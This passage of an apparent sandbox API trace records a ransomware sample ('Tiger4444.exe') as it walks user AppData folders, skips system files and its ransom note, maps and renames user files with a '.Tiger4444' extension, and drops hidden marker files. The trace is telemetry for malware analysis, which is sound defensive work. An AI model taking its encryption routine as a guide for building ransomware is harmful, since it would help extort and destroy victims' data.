lpString2="Tiger4444.exe") returned -1 [0057.892] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0057.892] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6c6f48d, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c903f8, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x8785b882, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.892] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.892] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0057.892] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0057.892] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0057.892] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0057.892] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8785b882, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8785b882, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8785b882, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0057.892] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.892] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0057.892] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c75633, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c75633, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe6c85414, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="session.sol", cAlternateFileName="")) returned 1 [0057.892] lstrcmpiW (lpString1="session.sol", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0057.892] lstrcmpiW (lpString1="session.sol", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.892] lstrcmpiW (lpString1="session.sol", lpString2="Tiger4444.exe") returned -1 [0057.892] lstrcmpiW (lpString1="session.sol", lpString2=".") returned 1 [0057.892] lstrcmpiW (lpString1="session.sol", lpString2="..") returned 1 [0057.892] lstrcmpiW (lpString1="session.sol", lpString2="windows") returned -1 [0057.892] lstrcmpiW (lpString1="session.sol", lpString2="bootmgr") returned 1 [0057.892] lstrcmpiW (lpString1="session.sol", lpString2="pagefile.sys") returned 1 [0057.892] lstrcmpiW (lpString1="session.sol", lpString2="boot") returned 1 [0057.892] lstrcmpiW (lpString1="session.sol", lpString2="ids.txt") returned 1 [0057.892] lstrcmpiW (lpString1="session.sol", lpString2="NTUSER.DAT") returned 1 [0057.892] lstrcpyW (in: lpString1=0x30aeb9e, lpString2="session.sol" | out: lpString1="session.sol") returned="session.sol" [0057.892] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf\\session.sol", dwFileAttributes=0x0) returned 1 [0057.893] lstrlenW (lpString="session.sol") returned 11 [0057.893] lstrlenW (lpString="Tiger4444") returned 9 [0057.893] lstrcmpiW (lpString1="ssion.sol", lpString2="Tiger4444") returned -1 [0057.893] lstrlenW (lpString=".dll") returned 4 [0057.893] lstrcmpiW (lpString1=".sol", lpString2=".dll") returned 1 [0057.893] lstrlenW (lpString=".lnk") returned 4 [0057.893] lstrcmpiW (lpString1=".sol", lpString2=".lnk") returned 1 [0057.893] lstrlenW (lpString=".ini") returned 4 [0057.893] lstrcmpiW (lpString1=".sol", lpString2=".ini") returned 1 [0057.893] lstrlenW (lpString=".sys") returned 4 [0057.893] lstrcmpiW (lpString1=".sol", lpString2=".sys") returned -1 [0057.893] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf\\session.sol" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\xcvudunh\\#appcontainer\\aa.online-metrix.net\\fpc.swf\\session.sol"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0057.893] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0057.893] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14934627859) returned 1 [0057.893] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=76) returned 1 [0057.893] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89a40 [0057.893] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0057.893] CreateFileMappingW (hFile=0x2b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x2cc [0058.293] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0xbe0000 [0058.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0058.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0058.294] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0058.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0058.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0058.294] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0058.294] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0058.294] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0058.294] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14974741075) returned 1 [0058.294] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89a40 | out: hHeap=0xc50000) returned 1 [0058.294] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0058.294] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0058.295] CloseHandle (hObject=0x2cc) returned 1 [0058.295] CloseHandle (hObject=0x2b8) returned 1 [0058.295] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf\\session.sol.Tiger4444") returned 144 [0058.295] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf\\session.sol" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\xcvudunh\\#appcontainer\\aa.online-metrix.net\\fpc.swf\\session.sol"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf\\session.sol.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\xcvudunh\\#appcontainer\\aa.online-metrix.net\\fpc.swf\\session.sol.tiger4444"), dwFlags=0x1) returned 1 [0058.295] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c75633, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c75633, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe6c85414, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="session.sol", cAlternateFileName="")) returned 0 [0058.295] FindClose (in: hFindFile=0xc72e08 | out: hFindFile=0xc72e08) returned 1 [0058.295] lstrcpyW (in: lpString1=0x30aeb9e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0058.296] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\xcvudunh\\#appcontainer\\aa.online-metrix.net\\fpc.swf\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0058.297] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0058.297] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0058.297] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0058.298] CloseHandle (hObject=0x2b8) returned 1 [0058.298] CloseHandle (hObject=0x2c4) returned 1 [0058.298] GetCurrentThreadId () returned 0xfa8 [0058.298] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc664c8 [0058.298] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe" [0058.298] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5e610 | out: hHeap=0xc50000) returned 1 [0058.298] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc664c0 | out: hHeap=0xc50000) returned 1 [0058.298] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe" [0058.298] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\" [0058.298] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\.BFC0E91B00AE8A0620D3" [0058.298] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0058.302] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0058.306] FlushFileBuffers (hFile=0x2c4) returned 1 [0058.307] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0058.307] CloseHandle (hObject=0x2c4) returned 1 [0058.307] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe") returned 37 [0058.307] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.307] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7b7983c6, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x87c3b457, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e08 [0058.308] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.308] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0058.308] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0058.308] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.308] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7b7983c6, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x87c3b457, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.308] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.308] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0058.308] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0058.308] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.308] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.308] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x87c3b457, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x87c3b457, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x87c615d4, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0058.308] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.308] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0058.308] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715a3e1e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x715a3e1e, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x715a3e1e, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0058.308] lstrcmpiW (lpString1="Acrobat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.308] lstrcmpiW (lpString1="Acrobat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.308] lstrcmpiW (lpString1="Acrobat", lpString2="Tiger4444.exe") returned -1 [0058.308] lstrcmpiW (lpString1="Acrobat", lpString2=".") returned 1 [0058.308] lstrcmpiW (lpString1="Acrobat", lpString2="..") returned 1 [0058.308] lstrcmpiW (lpString1="Acrobat", lpString2="windows") returned -1 [0058.308] lstrcmpiW (lpString1="Acrobat", lpString2="bootmgr") returned -1 [0058.308] lstrcmpiW (lpString1="Acrobat", lpString2="pagefile.sys") returned -1 [0058.308] lstrcmpiW (lpString1="Acrobat", lpString2="boot") returned -1 [0058.308] lstrcmpiW (lpString1="Acrobat", lpString2="ids.txt") returned -1 [0058.308] lstrcmpiW (lpString1="Acrobat", lpString2="NTUSER.DAT") returned -1 [0058.308] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="Acrobat" | out: lpString1="Acrobat") returned="Acrobat" [0058.308] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc664c0 [0058.308] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x5c) returned 0xc5e610 [0058.308] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc664c8 | out: ListHead=0xc66828, ListEntry=0xc664c8) returned 0xc66548 [0058.308] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe5380e4e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe5380e4e, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 1 [0058.308] lstrcmpiW (lpString1="Flash Player", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.308] lstrcmpiW (lpString1="Flash Player", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.309] lstrcmpiW (lpString1="Flash Player", lpString2="Tiger4444.exe") returned -1 [0058.309] lstrcmpiW (lpString1="Flash Player", lpString2=".") returned 1 [0058.309] lstrcmpiW (lpString1="Flash Player", lpString2="..") returned 1 [0058.309] lstrcmpiW (lpString1="Flash Player", lpString2="windows") returned -1 [0058.309] lstrcmpiW (lpString1="Flash Player", lpString2="bootmgr") returned 1 [0058.309] lstrcmpiW (lpString1="Flash Player", lpString2="pagefile.sys") returned -1 [0058.309] lstrcmpiW (lpString1="Flash Player", lpString2="boot") returned 1 [0058.309] lstrcmpiW (lpString1="Flash Player", lpString2="ids.txt") returned -1 [0058.309] lstrcmpiW (lpString1="Flash Player", lpString2="NTUSER.DAT") returned -1 [0058.309] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="Flash Player" | out: lpString1="Flash Player") returned="Flash Player" [0058.309] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc664e0 [0058.309] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x66) returned 0xc8f5b0 [0058.309] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc664e8 | out: ListHead=0xc66828, ListEntry=0xc664e8) returned 0xc664c8 [0058.309] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7161656c, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7161656c, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x7161656c, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Headlights", cAlternateFileName="HEADLI~1")) returned 1 [0058.309] lstrcmpiW (lpString1="Headlights", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.309] lstrcmpiW (lpString1="Headlights", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.309] lstrcmpiW (lpString1="Headlights", lpString2="Tiger4444.exe") returned -1 [0058.309] lstrcmpiW (lpString1="Headlights", lpString2=".") returned 1 [0058.309] lstrcmpiW (lpString1="Headlights", lpString2="..") returned 1 [0058.309] lstrcmpiW (lpString1="Headlights", lpString2="windows") returned -1 [0058.309] lstrcmpiW (lpString1="Headlights", lpString2="bootmgr") returned 1 [0058.309] lstrcmpiW (lpString1="Headlights", lpString2="pagefile.sys") returned -1 [0058.309] lstrcmpiW (lpString1="Headlights", lpString2="boot") returned 1 [0058.309] lstrcmpiW (lpString1="Headlights", lpString2="ids.txt") returned -1 [0058.309] lstrcmpiW (lpString1="Headlights", lpString2="NTUSER.DAT") returned -1 [0058.309] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="Headlights" | out: lpString1="Headlights") returned="Headlights" [0058.309] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66520 [0058.309] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x62) returned 0xc8f380 [0058.309] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66528 | out: ListHead=0xc66828, ListEntry=0xc66528) returned 0xc664e8 [0058.309] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715ca081, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x715ca081, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x715ca081, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 1 [0058.309] lstrcmpiW (lpString1="Linguistics", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0058.309] lstrcmpiW (lpString1="Linguistics", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.309] lstrcmpiW (lpString1="Linguistics", lpString2="Tiger4444.exe") returned -1 [0058.309] lstrcmpiW (lpString1="Linguistics", lpString2=".") returned 1 [0058.309] lstrcmpiW (lpString1="Linguistics", lpString2="..") returned 1 [0058.309] lstrcmpiW (lpString1="Linguistics", lpString2="windows") returned -1 [0058.309] lstrcmpiW (lpString1="Linguistics", lpString2="bootmgr") returned 1 [0058.310] lstrcmpiW (lpString1="Linguistics", lpString2="pagefile.sys") returned -1 [0058.310] lstrcmpiW (lpString1="Linguistics", lpString2="boot") returned 1 [0058.310] lstrcmpiW (lpString1="Linguistics", lpString2="ids.txt") returned 1 [0058.310] lstrcmpiW (lpString1="Linguistics", lpString2="NTUSER.DAT") returned -1 [0058.310] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="Linguistics" | out: lpString1="Linguistics") returned="Linguistics" [0058.310] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66560 [0058.310] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x64) returned 0xc8f690 [0058.310] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66568 | out: ListHead=0xc66828, ListEntry=0xc66568) returned 0xc66528 [0058.310] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715ca081, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7894b39b, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x7894b39b, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LogTransport2", cAlternateFileName="LOGTRA~1")) returned 1 [0058.310] lstrcmpiW (lpString1="LogTransport2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0058.310] lstrcmpiW (lpString1="LogTransport2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.310] lstrcmpiW (lpString1="LogTransport2", lpString2="Tiger4444.exe") returned -1 [0058.310] lstrcmpiW (lpString1="LogTransport2", lpString2=".") returned 1 [0058.310] lstrcmpiW (lpString1="LogTransport2", lpString2="..") returned 1 [0058.310] lstrcmpiW (lpString1="LogTransport2", lpString2="windows") returned -1 [0058.310] lstrcmpiW (lpString1="LogTransport2", lpString2="bootmgr") returned 1 [0058.310] lstrcmpiW (lpString1="LogTransport2", lpString2="pagefile.sys") returned -1 [0058.310] lstrcmpiW (lpString1="LogTransport2", lpString2="boot") returned 1 [0058.310] lstrcmpiW (lpString1="LogTransport2", lpString2="ids.txt") returned 1 [0058.310] lstrcmpiW (lpString1="LogTransport2", lpString2="NTUSER.DAT") returned -1 [0058.310] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="LogTransport2" | out: lpString1="LogTransport2") returned="LogTransport2" [0058.310] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66660 [0058.310] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x68) returned 0xc8f3f0 [0058.310] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66668 | out: ListHead=0xc66828, ListEntry=0xc66668) returned 0xc66568 [0058.310] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7b7983c6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7b7983c6, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x7b7983c6, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sonar", cAlternateFileName="")) returned 1 [0058.310] lstrcmpiW (lpString1="Sonar", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0058.310] lstrcmpiW (lpString1="Sonar", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.310] lstrcmpiW (lpString1="Sonar", lpString2="Tiger4444.exe") returned -1 [0058.310] lstrcmpiW (lpString1="Sonar", lpString2=".") returned 1 [0058.310] lstrcmpiW (lpString1="Sonar", lpString2="..") returned 1 [0058.310] lstrcmpiW (lpString1="Sonar", lpString2="windows") returned -1 [0058.310] lstrcmpiW (lpString1="Sonar", lpString2="bootmgr") returned 1 [0058.310] lstrcmpiW (lpString1="Sonar", lpString2="pagefile.sys") returned 1 [0058.310] lstrcmpiW (lpString1="Sonar", lpString2="boot") returned 1 [0058.310] lstrcmpiW (lpString1="Sonar", lpString2="ids.txt") returned 1 [0058.310] lstrcmpiW (lpString1="Sonar", lpString2="NTUSER.DAT") returned 1 [0058.310] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="Sonar" | out: lpString1="Sonar") returned="Sonar" [0058.310] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc665c0 [0058.310] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x58) returned 0xc60fe8 [0058.310] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc665c8 | out: ListHead=0xc66828, ListEntry=0xc665c8) returned 0xc66668 [0058.310] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: 